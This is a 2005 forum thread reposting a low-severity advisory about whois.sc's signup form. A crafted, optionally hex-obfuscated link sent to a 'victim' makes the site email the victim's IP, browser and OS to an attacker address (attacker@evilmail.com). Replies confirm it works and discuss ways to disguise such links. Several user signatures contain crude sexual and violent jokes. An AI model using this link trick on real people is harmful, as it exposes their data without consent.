Author Topic: Getting somebody's ip, browser, os, etc  (Read 6190 times)

0 Members and 1 Guest are viewing this topic.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Getting somebody's ip, browser, os, etc
« on: November 03, 2005, 09:58:35 am »
This really isn't terribly exciting, but it's a neat trick, and it shows some creative thought.  And that's one of the main principles of hacking: you've gotta think outside the box.

Quote
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obsfucate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Offline deadly7

  • 42
  • x86
  • Hero Member
  • *****
  • Posts: 6496
    • View Profile
Re: Getting somebody's ip, browser, os, etc
« Reply #1 on: November 03, 2005, 04:09:16 pm »
Neat. Though, with cPanel (I'm pretty sure Apache gives logs of visitors, too) it's pretty easy to get all of that information.. and with PHP writing to a text file.
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
 [17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Getting somebody's ip, browser, os, etc
« Reply #2 on: November 03, 2005, 07:43:18 pm »
That's assuming you have a web server. 

And by the way, it works:
Quote
---------------------------------------------------
NOTE: You received this message because someone from
142.161.170.11(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051025 Firefox/1.4.1)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------

Offline zorm

  • Hero Member
  • *****
  • Posts: 591
    • View Profile
    • Zorm's Page
Re: Getting somebody's ip, browser, os, etc
« Reply #3 on: November 05, 2005, 12:36:13 am »
Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.
"Frustra fit per plura quod potest fieri per pauciora"
- William of Ockham

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #4 on: November 05, 2005, 12:59:12 pm »
Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.
You can spoof POST variables with little more effort.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Getting somebody's ip, browser, os, etc
« Reply #5 on: November 05, 2005, 03:01:45 pm »
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #6 on: November 05, 2005, 03:09:07 pm »
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 


I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Getting somebody's ip, browser, os, etc
« Reply #7 on: November 05, 2005, 04:03:27 pm »
To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 


I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #8 on: November 05, 2005, 04:47:30 pm »
True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

It wouldn't be difficult at all, IMO.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Getting somebody's ip, browser, os, etc
« Reply #9 on: November 05, 2005, 06:10:20 pm »
Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #10 on: November 05, 2005, 06:22:38 pm »
Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Where in your first proposition did you say I couldn't use my own website? :(

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Getting somebody's ip, browser, os, etc
« Reply #11 on: November 05, 2005, 07:04:09 pm »
Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #12 on: November 05, 2005, 07:14:49 pm »
Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site?

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit"

I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.

Offline Ergot

  • 吴立峰 ^_^ !
  • x86
  • Hero Member
  • *****
  • Posts: 3724
  • I steal bandwidth. p_o
    • View Profile
Re: Getting somebody's ip, browser, os, etc
« Reply #13 on: November 06, 2005, 02:37:59 pm »
Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site?

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit"

I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.
Yea... Just like I can trick people into clicking random things ... (Like the whole Outwar thing).
My friends (In real life(yes I do have real life friends !)) don't trust my links anymore though :(
Who gives a damn? I fuck sheep all the time.
And yes, male both ends.  There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.
(05:55:03) JoE ThE oDD: omfg good job i got a boner thinkin bout them chinese bitches
(17:54:15) Sidoh: I love cosmetology

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: Getting somebody's ip, browser, os, etc
« Reply #14 on: November 06, 2005, 03:40:49 pm »
I don't either, you dirty whore.